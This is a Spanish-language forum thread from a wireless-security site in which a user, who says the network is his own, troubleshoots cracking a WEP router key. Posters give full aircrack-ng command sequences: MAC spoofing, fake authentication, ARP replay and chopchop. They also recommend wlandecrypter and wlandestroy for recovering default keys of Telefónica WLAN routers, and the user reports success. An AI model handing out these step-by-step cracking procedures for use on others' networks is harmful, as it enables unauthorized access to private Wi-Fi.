Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación?
08-Enero 20:58:20 (Jueves)
Inicio Ayuda Ingresar Registrarse
Noticias: Live CD wifiway-1.0 Final


Agregate al nuevo feed RSS 2.0 de seguridadwireless y mantente informado de forma resumida ===>
+  Seguridad Wireless
|-+  Suite Seguridad Wireless
| |-+  Live CD Wifislax (Moderadores: ChimoC, the_often, chinitiw)
| | |-+  Resultados de atak a WLAN
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 Imprimir
Autor Tema: Resultados de atak a WLAN  (Leído 2101 veces)
oju oju
*
Desconectado Desconectado

Mensajes: 41


« en: 21-Marzo 21:35:57 (Mircoles) »

Estoy intentando acceder a mi propia WLAN

Una vez puesto el driver rt73, la mac 00:11:22:--- y la usb en monitor, el Iwconfig me da:
Rausb0      rt73 WLAN      mode monitor     54 mb/s


Airodump-ng rausb0 me da:
Bssid: 00:16:-----     WEP    WLAN_E0    mb 54


Aireplay-ng –1 30 –e WLAN_E0 –a 00:16:----- -h 00:11:22:33----- rausb0 me da:
The interface MAC (00:0E:2E:---) (no se de donde sale esto) doent’s match the specifies MAC –h)
Ifconfig rausb0 hw ether 00:11:22:---
Comienza el comando a trabajar y al final indica:
Attack was unsucessful

Aireplay –3 -b 00:16:----- -h 00:11:22:33----- rausb0 me da:
Saving ARP request in replay_arp-0321-170526.cap
Notice: got a deauth / disassoc packet: is the souece MAC associated?
Read 4367 packets (got ARP resquest) send 0 packets


¿Ke pasa? ¿lo estoy haciendo bien? ¿simplemente no hay tráfico? ¿se debe emplear otro atake mejor?  toy pegao


En línea
oju oju
*
Desconectado Desconectado

Mensajes: 41


« Respuesta #1 en: 21-Marzo 23:29:06 (Mircoles) »

esto va aki o mejor en Universo wireless Huh

Puede contestar alguien?

salu2
En línea
golondrina
*
Desconectado Desconectado

Mensajes: 30


« Respuesta #2 en: 21-Marzo 23:35:31 (Mircoles) »

hola!
sobre lo primero que planteas a mi tb me pasaba usando aeroscript (por cierto te lo recomiendo es mucho mas comodo) y lo solucione poniendo mi mac falsa asi: 01:02:03:04:05 en vez de 11:22:33:44:55

En cuanto a lo segundo es cuestion de esperar, hay redes en las que espero unos 20-30 minutos hasta que coje los arps y empiezan a subir los datas, sin embargo en otras me canso de esperar y nada...

Suerte!
En línea
oju oju
*
Desconectado Desconectado

Mensajes: 41


« Respuesta #3 en: 22-Marzo 22:09:54 (Jueves) »

Con esa MAC pasa lo mismo. Lo he probado sta tarde.

Alguien puede aportar algo + ?

Salu2
En línea
Serch
***
Desconectado Desconectado

Mensajes: 174


« Respuesta #4 en: 22-Marzo 23:04:50 (Jueves) »

A ver.

Si con el ataque 1 te dice q es "Attack was unsucessful" es q no es efectivo. Prueba poner iwconfig device rate 1M (ej. iwconfig ath0 rate 1M) y luego repites el ataque 1. Si te dice q te has conectado ya puedes poner el 3. El ataque 3, sino te has asociado a esa red, no te funcionará nunca. La otra opcion es esperar q un cliente bueno y hacerle el ataque a ese cliente (sustituyes la mac falsa x la del cliente y te olvidas del ataque 1)
En línea
sezarmorante
*
Desconectado Desconectado

Mensajes: 40


« Respuesta #5 en: 23-Marzo 11:08:42 (Viernes) »

Yo creo q los routers de Timofonica no son vulnerables al atake 1 (es mi opinión).
Con otros routers he conseguido el arp rápidamente pero con las redes WLAN_XX no. También es cierto q no he tenido paciencia, y si en 5 min no he conseguido el arp lo he dejado.

Te recomiendo usar wlandestroy (es mejor wlaninject pero por ahora no va con wifislax) y wlandecrypter. Con eso puedes sacar la clave sin clientes asociados.

Si hay clientes asociados, es suficiente conseguir 2 "Data's" y con wlandecrypter se obtiene la clave al instante.

Salu2
En línea
*dudux
crustchaos
Moderador Global
******
Desconectado Desconectado

Mensajes: 3520



« Respuesta #6 en: 23-Marzo 13:27:04 (Viernes) »

tienes puesta la clave por defecto?
En línea

./wireless_attack..........
athAG660
*
Desconectado Desconectado

Mensajes: 7


« Respuesta #7 en: 23-Marzo 21:19:40 (Viernes) »

¿Utilizas el macchanger antes de realizar el ataque con cliente falso?
Debes cambiar la mac de tu tarjeta para no tener problemas con el driver a la hora de hacer el ataque 1
En línea
oju oju
*
Desconectado Desconectado

Mensajes: 41


« Respuesta #8 en: 24-Marzo 00:27:32 (Sbado) »

Bueno, por partes. Todo el proceso k hago desde k meto el Livecd es el siguiente:

Boot: ws nopcmcia (se rebotaba una y otra vez)
ifconfig rausb0 down
macchanger –m 00:11:22:33:44:55 rausb0
rmmod rt73
rmmod rt2570
modprobe rt73
ifconfig rausb0 up
iwconfig rausb0 mode monitor
iwconfig rausb0 rate 1M
airodump-ng rausb0

En otra terminal: aireplay-ng   -1   30   -e nombre(essid)   -a  mac(bssid) -h  00:11:22:33:44:55 rausb0
En otra terminal: aireplay-ng   -3   -b   mac(bssid)   -h   00:11:22:33:44:55 rausb0
En otra terminal: airodump-ng   -c   canal_ap   archivo.ivs   rausb0
En otra terminal: aircrack-ng       archivo.ivs   rausb0  (no se si esto está bien?Huh)
Como dije la Mac 00:01:02.... no solucionó el problema, aunk lo intenté con aireplay y no con aeroscrit: LO PROBARÉ
Con el Rate 1M lo mismo.
Aun no he probado con Wlandestroy. LO PROBARÉ.
Lo de la clave no se k ostias es. Con mi nivel no llego a muchos conceptos: clave, madwifi, ... me keda tela por aprender.
Respecto la macchanger creo k lo pongo bien ¿???

Bueno tengo tarea para este finde, creo k el lunes por la noche posteare con todo lo k me haya pasado.
En línea
oju oju
*
Desconectado Desconectado

Mensajes: 41


« Respuesta #9 en: 24-Marzo 01:03:09 (Sbado) »

No soy capaz de bajarme el dichoso wlandestroy. lo k he encontardo es:

http://www.fuerzaiberica.com/nil/rusoblanco/descargas/wlandestroy.sh.gz

Pero lo k me baja es wlandestroy.sh  archivo GZ de 1KB

¿es correcto?

Si es así k debo de hacer, pues trabajo con el livecd sin instalar en el disco duro.

wlandestroy.sh {INTERFAZ} {ESSID} {BSSID} {CANAL} {fichero_claves
simplemente ?  otra kosa el archivo es .txt .cap o .ivs???
En línea
oju oju
*
Desconectado Desconectado

Mensajes: 41


« Respuesta #10 en: 24-Marzo 23:59:50 (Sbado) »

Por lo k especta al AIROSCRIPT na d na. El atak 1 me da lo siguiente:

MAC               CHAN     SECU     POWER    CHAR    SSID
1) head:/root/swireless/airoscript/dump-01.txt: invalid number of lines

Podrá ser k al arrankar el livecd tengo k poner WS NOPCMCIA?Huh?  si no es k no me arranca el live cd se rebota una y otra vez
« Última modificación: 25-Marzo 00:14:01 (Domingo) por oju oju » En línea
sezarmorante
*
Desconectado Desconectado

Mensajes: 40


« Respuesta #11 en: 25-Marzo 10:53:57 (Domingo) »

No se exactamente cuanto ocupa el wlandestroy, pero yo creo q sí es correcto (es solo un poco de texto).

1º Debes generar el fichero de claves con wlandecrypter
2º aireplay-ng -4 -b {bssid} -f1 {interfaz}
2º Usas wlandestroy:
wlandestroy.sh {INTERFAZ} {ESSID} {BSSID} {CANAL} {fichero_claves

en la página d donde te lo has bajado te lo explican paso a paso
Salu2
En línea
oju oju
*
Desconectado Desconectado

Mensajes: 41


« Respuesta #12 en: 26-Marzo 21:40:16 (Lunes) »

Me stoy currando esto pero tela del telón, el problema es k llego a las cosas y siempre me surgen más dudas.

Hoy me he bajado (imprimido) los manueles de Comprobación sseguridad WPA-PSK (27 paginas), los manueles de airodump, aireplay y aircrack ( un chorro de páginas), la guia de iniciación a la shell  y contenidos básicos (48 paginas de rh3t0n). En fin las estoy digiriendo.

De momento creo k el camino con wlandecrypter y destroy es el bueno (abandono el aireplay ..., pues no tengo cliente)

El problema del WLANDESTROY es k no se k hacer con él. con el live-cd lo he copiado en varios directorios, en el disco duro y lo he intentado ejecutar desde el directorio, pero siempre me dice que el comando no lo reconoce. ¿¿¿¿ K HAY K HACER CON EL ARCHIVO K BAJÉ DE INTERNET Huh?
En línea
oju oju
*
Desconectado Desconectado

Mensajes: 41


« Respuesta #13 en: 27-Marzo 13:34:10 (Martes) »

Por favor k alguien me diga como utilizar el wlandestroy con el live cd
En línea
sezarmorante
*
Desconectado Desconectado

Mensajes: 40


« Respuesta #14 en: 28-Marzo 13:39:09 (Mircoles) »

Aki tienes el manual paso a paso, no pasa nada por buscar un poco q el enlace está en la pagina donde te bajastes el wlandestroy

http://foro.elhacker.net/index.php/topic,126683.0.html

Solo te digo q con wifislax puedes usar aircrack-ng en vez de wepattack, pero cuando tengas 2 paketes.

Salu2
En línea
oju oju
*
Desconectado Desconectado

Mensajes: 41


« Respuesta #15 en: 29-Marzo 09:06:54 (Jueves) »

Millón de gracias.

Viva el AIRCRACK (3 segundos y listo)

Eto e in creible

Peaso de trabajo la distro 2.0
En línea
*dudux
crustchaos
Moderador Global
******
Desconectado Desconectado

Mensajes: 3520



« Respuesta #16 en: 30-Marzo 03:09:14 (Viernes) »

wlaninject con 2 tarjetas o la ipw2200............
http://foro.seguridadwireless.net/index.php/topic,1617.0.html
En línea

./wireless_attack..........
sezarmorante
*
Desconectado Desconectado

Mensajes: 40


« Respuesta #17 en: 31-Marzo 13:49:55 (Sbado) »

Gracias dudux, pero todavía está dificil wlaninject en wifislax no??
Cuando se pueda avisa!! que tengo ganas de probarlo

Salu2
En línea
*dudux
crustchaos
Moderador Global
******
Desconectado Desconectado

Mensajes: 3520



« Respuesta #18 en: 31-Marzo 15:12:03 (Sbado) »

yo no lo he probado en wifislax.......en debian funciona bien.....haber si se pone para la proxima version
En línea

./wireless_attack..........
oju oju
*
Desconectado Desconectado

Mensajes: 41


« Respuesta #19 en: 31-Marzo 16:33:59 (Sbado) »

Ni chop chop ni nda, vaya como quita trabajo el WZCOOK.

C'est magnifique¡¡¡¡¡¡¡
En línea
Páginas: 1 Imprimir 
« anterior próximo »
Ir a:  

Powered by SMF 1.1.7 | SMF © 2006, Simple Machines LLC
Consejos publicitarios

Loans - Debt Consolidation - Phoenix Pools - Credit Cards